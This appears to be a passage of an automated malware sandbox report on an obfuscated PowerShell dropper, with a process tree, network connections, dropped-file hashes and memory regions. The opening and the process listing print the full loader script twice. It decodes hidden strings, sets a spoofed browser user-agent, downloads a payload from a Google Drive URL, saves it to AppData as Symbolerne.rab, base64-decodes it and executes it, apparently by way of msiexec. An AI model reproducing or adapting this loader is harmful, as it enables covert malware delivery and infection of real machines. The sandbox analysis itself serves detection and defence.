Bega3Tvill1No.na.Kunde0Dispu)delmo SelvoGDiskoeOlenbc.hyrokIn teoCofer/inher2osmid0Prece1indl,0 Doro0B bel1Retin0Villa1Murde H emaFToupei tikkrHngepeisthmfTomfoo SenaxStand/,rans1S.ovl3M nom1Squel.Fuldb0skarn ';$Adenomycosis=Pummice 'InferUho.edSD.ngdETuberRPanin-isin aAnatog A.oxENonhyNTryghTOlg m ';$Udgivelsesdags=Pummice 'UnexahUnrintSamsvt ArmapremtrsResys: Graa/Under/hovedd onlarSul.iiJord v isyoeLager.PloddgBr.msoS irioManomg Wun,lDiphteBorge.NondecInsoloSpaewmUnph /ArbejuFedercAngka?Gymnae P epxafvispRestsoLedelrEntertMenne=S.ppodSpecio lmemwRum snFarlilMonito AbstaGrim,dSpejl& LivsiDoms d ipie= elvt1SifflT PalaWReakts atal7Blast0Femte2 Ha.vsStamp0Totall DataVDec a2StedsuMa,kipAns,amStr fHPhonor D miuServi5BespepWarszBB urrQRecepPC ikagUdbe vD,ssy2La riIKlaveuOratoV,ksgrW RummAAfrydmKogeri Nost ';$Promulges=Pummice ' Kont>Tunge ';$Blokdiagrams=Pummice 'Fila ISamfueR.gimXEncep ';$Slikne='netherlands';$Uraturia='\Symbolerne.rab';Tvanglst (Pummice 'Forpl$ PalpgBrioclBilfao Be jbKrockAVe omL Welt: FedtFAkromRIndigA.rousFNominlF letYCo cet AarpnUreteiFrasiNAlveog CeneeOprrsRFatal=Turfs$Boar eH,poiNPensiV N.tt:NrkleaSveskpHektapansgndFlersa ScatT mooAOut.a+Ander$Indflu Woddr.tabbaFordetDecliuWork RKata IElev,ARegai ');Tvanglst (Pummice ' Ding$StandGFormul ektooRettibplanta FredlLandb: urbeTGasmaiIwortlRen,eFT.ldrl TranU RumfgH,emmtPolybs AdmoS forttSkyndEFeticd.ypegSUnsal= Lyds$MarkeUInfird Sli.GImmuniCoojaVGeorgeEqu,sLRri tsunb hEAfsgtsHughldSup raMohu gt rivs Sagu.UdlanSUidenpvejerLIl oriSbefaTbemgt(Hiero$SpidsPAfsenRGendrOuniteMAlt.rUFor aLDechlGReburE SoveS S pe)Stick ');Tvanglst (Pummice ' Onto[ ositnDyrtiESm latOutle.PerfoSPlaceeHo.jgRNa.urV R ttiIdeolcLin,eeFraskP CaucOSammeI LifeNtank,t Crafm.ommeAHoneyNskat.A hotoGFlop,E SmaaRAntim]Afsbn:Nonpr:KabbasCalleEKrigsCVveneuDelstRdanskI EconT AmbrYUn,mppTacsoRUnforo lasst sandoInterCR diooDuntsl algs Auxi=Myolo Crewe[stemnNDiploeM,neyTNonde.HasteSIdrtse elleCEvaluUArbejrV entIK talTA falySkraap,ankfRRee.iOsatirT stifoApolac N nroOpfrilhjmodT.ogklY Kn,upKaa.eeSt kr],ljen:Parac:intintV.lbeLDicemSMetas1Aktiv2Lbehj ');$Udgivelsesdags=$Tilflugtssteds[0];$Giftstof=(Pummice 'L,nds$aer dG jenLsovjeOPipewbalexiaNord.LCrown: Sem ROecu E TykkKTryllO GulvrTribuDDobbeD UnfaAUforsGUdvikETapha=Ske nnFnokueInterwPolyp-AksonOTopeeBBigbajPresseFaktucTitmetSidde SlufsLavsoYFor,tS TrsnT U loeNeba,Munco..Dors nTr llE HogrTRavel.LongsWJudgeEOmbribSeptuCS,ldalamidaiEntanEHy otn GestT Pers ');Tvanglst ($Giftstof);Tvanglst (Pummice 'Aabn.$Spe,gRSles eMag.ok RagtoUng rrHovedd.veredOevelari gegMicheeConge.HosemHBwanaeChalaa atald RudeepromirCoiffs casu[Falci$ VkstATjenedNyd le BagmnSka aoStramm.orstyA tiocSten oModelsQuen iD ffes kewl]Whit,=Hove $Fro od BlomoBilinkBa gauSatsfmKegleeSkr dn Hrznt ttefn T,ouaNonhovBedotn AbereTrf,etSsona ');$Blindfoldedly=Pummice 'vadeh$Sk,zoR CitrePensikChu ro OverrE cumdEkstedReproaGenisgSandeeUnsta.C.tabDDeseroAra kwVaab,nDds,il KursoSpheraTilladGoverFTransi atenlstrabeUnq a(V oli$S.affUMaanedPorthg.erviiPuzzlvStri eInfralTeknis egleFlg,ss nsfdLussiaStormgNaadesViv s,craft$bedreAUnplam Ei ei.onset MunsrPrai oPumpilDrvt eAntib)Iso o ';$Amitrole=$Fraflytninger;Tvanglst (Pummice 'inte $act vgrikkel F rgoPseudBFenchARaserlFlere:folkeiNutatNSociet Und,e Skv,RUnderiReggeoEnaarNFliddI ragecJ zzi=Lse,a( omprtBronzEStenus Le,etAfhor- Restp HaraaForbrt A behTa ul ,utot$ BevgA Kolom dvanISuperT FyrarMdreno.romoL planeUncon)Execu ');while (!$interionic) {Tvanglst (Pummice 'Umaad$ba ekgTrykklSalgsoMikkabNonwoaSheril Hosi:PuppyPArve.pSkifflTjene=Fodba$DatastanarkrSikkeuUnimpeM ljf ') ;Tvanglst $Blindfoldedly;Tvanglst (Pummice 'AntimsLorent nsolAPopulrcyclitLangu-FerdySFiskelUl.raEO ernemandiPSteno Bygge4Slnge ');Tvanglst (Pummice ' ngdo$ UntugTsoreLKnopuOBeskuBF ilgA outbl Brsm:antaeITerroNBg.sktKonsuedrivmrPha.lIAth,eO LensN Ov,riS.ardC O tt=Draab(Unva,TKaukaeZipevsTrekltUnpro- DemoPOps.iA Verit iddeh Unit Forci$SnorrADesigm Pre.ITyrant ComprAeri OArreslMasseeTilke) Junc ') ;Tvanglst (Pummice 'Co se$Kvadrg Bac LUntraoUn ndbAnmela S del Angi:NiggaSTavleiNoninMSaliep edlelUnvehi FagmcbyranEMikass Wumm= Afsk$Kal.mG.ilbaLS,perOLysrebSeismA Hug lRackm: Uda Asalatn Tovel SymmB amlN InkoIHulslNs ring onvuE MennNDemo,s Part+ Cona+Tyref%repre$HedniTOra lI ammeLinterfKartoLH,tteuFrem GSlutrt Hov sAbiossSluddTOffeneSpaliD K nesNe.tr.R liqcRibboOStomaUOffloN,lavitUd kr ') ;$Udgivelsesdags=$Tilflugtssteds[$Simplices];}$Podzolic=313753;$Maidenhood=30049;Tvanglst (Pummice 'Ether$ .elegKlvesl raveO Fo kb Sleya LandlCruth:PreindDmrinICampeo PrecICheriC,krivOUnderuAlb msHora LMoistyTryma Melle=Unspe MetasGNonamE.oucatPolde-SkandcSkilro rysn,easutCor,ieAfrydnKaja.T Pane Jaste$KimbeAHybenmAcrazi unitOliemrLam nOD scolUteroegauds ');Tvanglst (Pummice ' orru$E,keng Mut,lArgumoAggelbHydraa Linnl eury:TricoD SupeeFagsnnDovetaTrappt ideliPostaoLaconn SparaSnowslNonfaiCommesRetroe Poly Slikk=Tring Strud[SnakkSFedthyUnmersNum itIncoreSat,lmVrdi . Utr.C.odbro.ongwnB.stivNonhyeB llorKodeot ysiu]ottea: Ko n: afgnFDisporLukreo CalmmanaglBAakirasubansPentie Vina6 Stil4 da.sS CopatSemisr Nyspi Jot.nForudgSlagf(Inkli$ A.owDSanggiSmkfoo.ordsiVandkcEndosoSteerugunjss arnelPolyuyOdome) eter ');Tvanglst (Pummice ' Prov$ PneuG OestlClippOLand,bBre naSkrivl hioa:Otolor lcohE rawS kninT udb sBarfokSpatiASe,ektCo fet AfbaEFirkaR ,dskNForbieblank horm =Tauri Acc.m[RehanSHstruyMangesEnseaTkli aeB ckemBlndd.A.imatSkumsetraurXTiaart Bec .InsulEOvertn,rkitcPothooCachiDEksp.iUbeslNB okeGSemin]Unif,:pille:fravra roads.ukasc ConfIOnaniI Exig.TrskeG Ossie OvertDiplosUnearTChaldRAnforIFuldkNSkubbGAlges( ofi$ ejenDP,emieGarliNAfbraA N,noTDrejeIRiddeOParfuN MageaUnciaLselvbiMo als.rgerEAmphi)Expat ');Tvanglst (Pummice ' nmob$ Cas GPicniLReaffo krisbVelmaAFilosl M.no:UnderfStandOfenniTDiagnoRequ tImp rE udcK nchaeSovemr SeresScop,=Flaci$BloopR aerteSandbsup tatDy elS HypoKHabitaVrelsTImplitUnleaEForldrVaconnErgonE Udsn.SoergSInte,UKernebLaengsMatteTU joir.roniiRose nanapng repa(Count$HydropDechio Ran,dLobelZDvst.oTidssLRetiniBrattcWayfa,Undou$ .xpeMDuopoAClypeiCorrodSvedjE.ftviNHj neHSelskOImproo AfspdSanbe)Cir u ');Tvanglst $Fototekers;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Gulvtppes adelskrones Saligprisningerne Issens #>;$Conversance='Trecifrede';<#Rungs Spongian Thinglikeness Festonerne Mix #>;$Omnilingual=$Unbrotherliness112+$host.UI; function Pummice($Additionstegnene){If ($Omnilingual) {$Rabbit185++;}$Pusses=$Oprydningsarbejdencumberment+$Additionstegnene.'Length'-$Rabbit185; for( $Oprydningsarbejde=5;$Oprydningsarbejde -lt $Pusses;$Oprydningsarbejde+=6){$moradserne=$Oprydningsarbejde;$Reders+=$Additionstegnene[$Oprydningsarbejde];$Sneugle='universitetsstillingens';}$Reders;}function Tvanglst($Paniclike){ . ($Blokdiagrams) ($Paniclike);}$dokumentnavnet=Pummice 'trimmMSulpho Br.ezPrismiStalil T.knlKnothaSturd/ Coh ';$dokumentnavnet+=Pummice 'Ens.a5Erant.Organ0Eso.h Forha(OrganWAntiniVe nanUnwagdFordloTestaw nopss Figu KartoNNut dT Rham filmi1Parla0Comed.Aviru0Tilbj; Skab WaitiW Terpi,xplon ,dvi6 Sab 4Miner; Velu HillxUnder6Storr4U ind; Al h Di trDeempvSneez: oloc1 Bega3Tvill1No.na.Kunde0Dispu)delmo SelvoGDiskoeOlenbc.hyrokIn teoCofer/inher2osmid0Prece1indl,0 Doro0B bel1Retin0Villa1Murde H emaFToupei tikkrHngepeisthmfTomfoo SenaxStand/,rans1S.ovl3M nom1Squel.Fuldb0skarn ';$Adenomycosis=Pummice 'InferUho.edSD.ngdETuberRPanin-isin aAnatog A.oxENonhyNTryghTOlg m ';$Udgivelsesdags=Pummice 'UnexahUnrintSamsvt ArmapremtrsResys: Graa/Under/hovedd onlarSul.iiJord v isyoeLager.PloddgBr.msoS irioManomg Wun,lDiphteBorge.NondecInsoloSpaewmUnph /ArbejuFedercAngka?Gymnae P epxafvispRestsoLedelrEntertMenne=S.ppodSpecio lmemwRum snFarlilMonito AbstaGrim,dSpejl& LivsiDoms d ipie= elvt1SifflT PalaWReakts atal7Blast0Femte2 Ha.vsStamp0Totall DataVDec a2StedsuMa,kipAns,amStr fHPhonor D miuServi5BespepWarszBB urrQRecepPC ikagUdbe vD,ssy2La riIKlaveuOratoV,ksgrW RummAAfrydmKogeri Nost ';$Promulges=Pummice ' Kont>Tunge ';$Blokdiagrams=Pummice 'Fila ISamfueR.gimXEncep ';$Slikne='netherlands';$Uraturia='\Symbolerne.rab';Tvanglst (Pummice 'Forpl$ PalpgBrioclBilfao Be jbKrockAVe omL Welt: FedtFAkromRIndigA.rousFNominlF letYCo cet AarpnUreteiFrasiNAlveog CeneeOprrsRFatal=Turfs$Boar eH,poiNPensiV N.tt:NrkleaSveskpHektapansgndFlersa ScatT mooAOut.a+Ander$Indflu Woddr.tabbaFordetDecliuWork RKata IElev,ARegai ');Tvanglst (Pummice ' Ding$StandGFormul ektooRettibplanta FredlLandb: urbeTGasmaiIwortlRen,eFT.ldrl TranU RumfgH,emmtPolybs AdmoS forttSkyndEFeticd.ypegSUnsal= Lyds$MarkeUInfird Sli.GImmuniCoojaVGeorgeEqu,sLRri tsunb hEAfsgtsHughldSup raMohu gt rivs Sagu.UdlanSUidenpvejerLIl oriSbefaTbemgt(Hiero$SpidsPAfsenRGendrOuniteMAlt.rUFor aLDechlGReburE SoveS S pe)Stick ');Tvanglst (Pummice ' Onto[ ositnDyrtiESm latOutle.PerfoSPlaceeHo.jgRNa.urV R ttiIdeolcLin,eeFraskP CaucOSammeI LifeNtank,t Crafm.ommeAHoneyNskat.A hotoGFlop,E SmaaRAntim]Afsbn:Nonpr:KabbasCalleEKrigsCVveneuDelstRdanskI EconT AmbrYUn,mppTacsoRUnforo lasst sandoInterCR diooDuntsl algs Auxi=Myolo Crewe[stemnNDiploeM,neyTNonde.HasteSIdrtse elleCEvaluUArbejrV entIK talTA falySkraap,ankfRRee.iOsatirT stifoApolac N nroOpfrilhjmodT.ogklY Kn,upKaa.eeSt kr],ljen:Parac:intintV.lbeLDicemSMetas1Aktiv2Lbehj ');$Udgivelsesdags=$Tilflugtssteds[0];$Giftstof=(Pummice 'L,nds$aer dG jenLsovjeOPipewbalexiaNord.LCrown: Sem ROecu E TykkKTryllO GulvrTribuDDobbeD UnfaAUforsGUdvikETapha=Ske nnFnokueInterwPolyp-AksonOTopeeBBigbajPresseFaktucTitmetSidde SlufsLavsoYFor,tS TrsnT U loeNeba,Munco..Dors nTr llE HogrTRavel.LongsWJudgeEOmbribSeptuCS,ldalamidaiEntanEHy otn GestT Pers ');Tvanglst ($Giftstof);Tvanglst (Pummice 'Aabn.$Spe,gRSles eMag.ok RagtoUng rrHovedd.veredOevelari gegMicheeConge.HosemHBwanaeChalaa atald RudeepromirCoiffs casu[Falci$ VkstATjenedNyd le BagmnSka aoStramm.orstyA tiocSten oModelsQuen iD ffes kewl]Whit,=Hove $Fro od BlomoBilinkBa gauSatsfmKegleeSkr dn Hrznt ttefn T,ouaNonhovBedotn AbereTrf,etSsona ');$Blindfoldedly=Pummice 'vadeh$Sk,zoR CitrePensikChu ro OverrE cumdEkstedReproaGenisgSandeeUnsta.C.tabDDeseroAra kwVaab,nDds,il KursoSpheraTilladGoverFTransi atenlstrabeUnq a(V oli$S.affUMaanedPorthg.erviiPuzzlvStri eInfralTeknis egleFlg,ss nsfdLussiaStormgNaadesViv s,craft$bedreAUnplam Ei ei.onset MunsrPrai oPumpilDrvt eAntib)Iso o ';$Amitrole=$Fraflytninger;Tvanglst (Pummice 'inte $act vgrikkel F rgoPseudBFenchARaserlFlere:folkeiNutatNSociet Und,e Skv,RUnderiReggeoEnaarNFliddI ragecJ zzi=Lse,a( omprtBronzEStenus Le,etAfhor- Restp HaraaForbrt A behTa ul ,utot$ BevgA Kolom dvanISuperT FyrarMdreno.romoL planeUncon)Execu ');while (!$interionic) {Tvanglst (Pummice 'Umaad$ba ekgTrykklSalgsoMikkabNonwoaSheril Hosi:PuppyPArve.pSkifflTjene=Fodba$DatastanarkrSikkeuUnimpeM ljf ') ;Tvanglst $Blindfoldedly;Tvanglst (Pummice 'AntimsLorent nsolAPopulrcyclitLangu-FerdySFiskelUl.raEO ernemandiPSteno Bygge4Slnge ');Tvanglst (Pummice ' ngdo$ UntugTsoreLKnopuOBeskuBF ilgA outbl Brsm:antaeITerroNBg.sktKonsuedrivmrPha.lIAth,eO LensN Ov,riS.ardC O tt=Draab(Unva,TKaukaeZipevsTrekltUnpro- DemoPOps.iA Verit iddeh Unit Forci$SnorrADesigm Pre.ITyrant ComprAeri OArreslMasseeTilke) Junc ') ;Tvanglst (Pummice 'Co se$Kvadrg Bac LUntraoUn ndbAnmela S del Angi:NiggaSTavleiNoninMSaliep edlelUnvehi FagmcbyranEMikass Wumm= Afsk$Kal.mG.ilbaLS,perOLysrebSeismA Hug lRackm: Uda Asalatn Tovel SymmB amlN InkoIHulslNs ring onvuE MennNDemo,s Part+ Cona+Tyref%repre$HedniTOra lI ammeLinterfKartoLH,tteuFrem GSlutrt Hov sAbiossSluddTOffeneSpaliD K nesNe.tr.R liqcRibboOStomaUOffloN,lavitUd kr ') ;$Udgivelsesdags=$Tilflugtssteds[$Simplices];}$Podzolic=313753;$Maidenhood=30049;Tvanglst (Pummice 'Ether$ .elegKlvesl raveO Fo kb Sleya LandlCruth:PreindDmrinICampeo PrecICheriC,krivOUnderuAlb msHora LMoistyTryma Melle=Unspe MetasGNonamE.oucatPolde-SkandcSkilro rysn,easutCor,ieAfrydnKaja.T Pane Jaste$KimbeAHybenmAcrazi unitOliemrLam nOD scolUteroegauds ');Tvanglst (Pummice ' orru$E,keng Mut,lArgumoAggelbHydraa Linnl eury:TricoD SupeeFagsnnDovetaTrappt ideliPostaoLaconn SparaSnowslNonfaiCommesRetroe Poly Slikk=Tring Strud[SnakkSFedthyUnmersNum itIncoreSat,lmVrdi . Utr.C.odbro.ongwnB.stivNonhyeB llorKodeot ysiu]ottea: Ko n: afgnFDisporLukreo CalmmanaglBAakirasubansPentie Vina6 Stil4 da.sS CopatSemisr Nyspi Jot.nForudgSlagf(Inkli$ A.owDSanggiSmkfoo.ordsiVandkcEndosoSteerugunjss arnelPolyuyOdome) eter ');Tvanglst (Pummice ' Prov$ PneuG OestlClippOLand,bBre naSkrivl hioa:Otolor lcohE rawS kninT udb sBarfokSpatiASe,ektCo fet AfbaEFirkaR ,dskNForbieblank horm =Tauri Acc.m[RehanSHstruyMangesEnseaTkli aeB ckemBlndd.A.imatSkumsetraurXTiaart Bec .InsulEOvertn,rkitcPothooCachiDEksp.iUbeslNB okeGSemin]Unif,:pille:fravra roads.ukasc ConfIOnaniI Exig.TrskeG Ossie OvertDiplosUnearTChaldRAnforIFuldkNSkubbGAlges( ofi$ ejenDP,emieGarliNAfbraA N,noTDrejeIRiddeOParfuN MageaUnciaLselvbiMo als.rgerEAmphi)Expat ');Tvanglst (Pummice ' nmob$ Cas GPicniLReaffo krisbVelmaAFilosl M.no:UnderfStandOfenniTDiagnoRequ tImp rE udcK nchaeSovemr SeresScop,=Flaci$BloopR aerteSandbsup tatDy elS HypoKHabitaVrelsTImplitUnleaEForldrVaconnErgonE Udsn.SoergSInte,UKernebLaengsMatteTU joir.roniiRose nanapng repa(Count$HydropDechio Ran,dLobelZDvst.oTidssLRetiniBrattcWayfa,Undou$ .xpeMDuopoAClypeiCorrodSvedjE.ftviNHj neHSelskOImproo AfspdSanbe)Cir u ');Tvanglst $Fototekers;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1676 -ip 1676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 1628

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 70.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.178.3:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.178.3:80 o.pki.goog tcp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 105.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

memory/2004-0-0x00007FFE57A63000-0x00007FFE57A65000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1j4t5zg1.nd5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2004-10-0x000001A7DDB60000-0x000001A7DDB82000-memory.dmp

memory/2004-11-0x00007FFE57A60000-0x00007FFE58521000-memory.dmp

memory/2004-12-0x00007FFE57A60000-0x00007FFE58521000-memory.dmp

memory/2004-14-0x00007FFE57A63000-0x00007FFE57A65000-memory.dmp

memory/2004-15-0x00007FFE57A60000-0x00007FFE58521000-memory.dmp

memory/2004-17-0x00007FFE57A60000-0x00007FFE58521000-memory.dmp

memory/2004-20-0x00007FFE57A60000-0x00007FFE58521000-memory.dmp

memory/5100-21-0x0000000002C60000-0x0000000002C96000-memory.dmp

memory/5100-22-0x00000000057C0000-0x0000000005DE8000-memory.dmp

memory/5100-23-0x00000000056B0000-0x00000000056D2000-memory.dmp

memory/5100-24-0x0000000005750000-0x00000000057B6000-memory.dmp

memory/5100-25-0x0000000005E60000-0x0000000005EC6000-memory.dmp

memory/5100-35-0x0000000005F50000-0x00000000062A4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cb3bb854ff414cb031c64e184fd44781
SHA1 f53d30f0585d05a14f7dd82f2d0997ab44b02d62
SHA256 42a5d533e9f3aa3407b26bd46789cd5b5f5eb580a51e64ced44c4e34c9c49896
SHA512 9fdeb2a9b6fdd107e1ea87e646d295150fb0c8e1d1b32737cfb3fbfec9d2e595e237055676608e3474569e53b45e825b0ce28403de219cd36e48f7a3cb60e047

memory/5100-37-0x0000000006560000-0x000000000657E000-memory.dmp

memory/5100-38-0x00000000065B0000-0x00000000065FC000-memory.dmp

memory/5100-39-0x0000000007F00000-0x000000000857A000-memory.dmp

memory/5100-40-0x0000000006B00000-0x0000000006B1A000-memory.dmp

memory/5100-41-0x0000000007880000-0x0000000007916000-memory.dmp

memory/5100-42-0x0000000007780000-0x00000000077A2000-memory.dmp

memory/5100-43-0x0000000008580000-0x0000000008B24000-memory.dmp

C:\Users\Admin\AppData\Roaming\Symbolerne.rab

MD5 4fa4bfe12534bd26a9e268a1e659e510
SHA1 f42014f4e7c0f11f4bb5f559c88310eb6db186a3
SHA256 11afe6c52f7a904b67ba53610b57fa82e585f432eb9e9d1631310661242d75c0
SHA512 34e15da584c5105daf9d4b4f241fcc8439a1a2bcaba3625aa6fd2ec0f1b9d70335825e1e4b133d2ed53cd1594be0a7a031799b8fc29409a32a60b83f61f3ef01

memory/5100-45-0x0000000008B30000-0x000000000DD19000-memory.dmp

memory/1676-58-0x0000000000800000-0x0000000001A54000-memory.dmp

memory/1676-59-0x0000000000800000-0x0000000001A54000-memory.dmp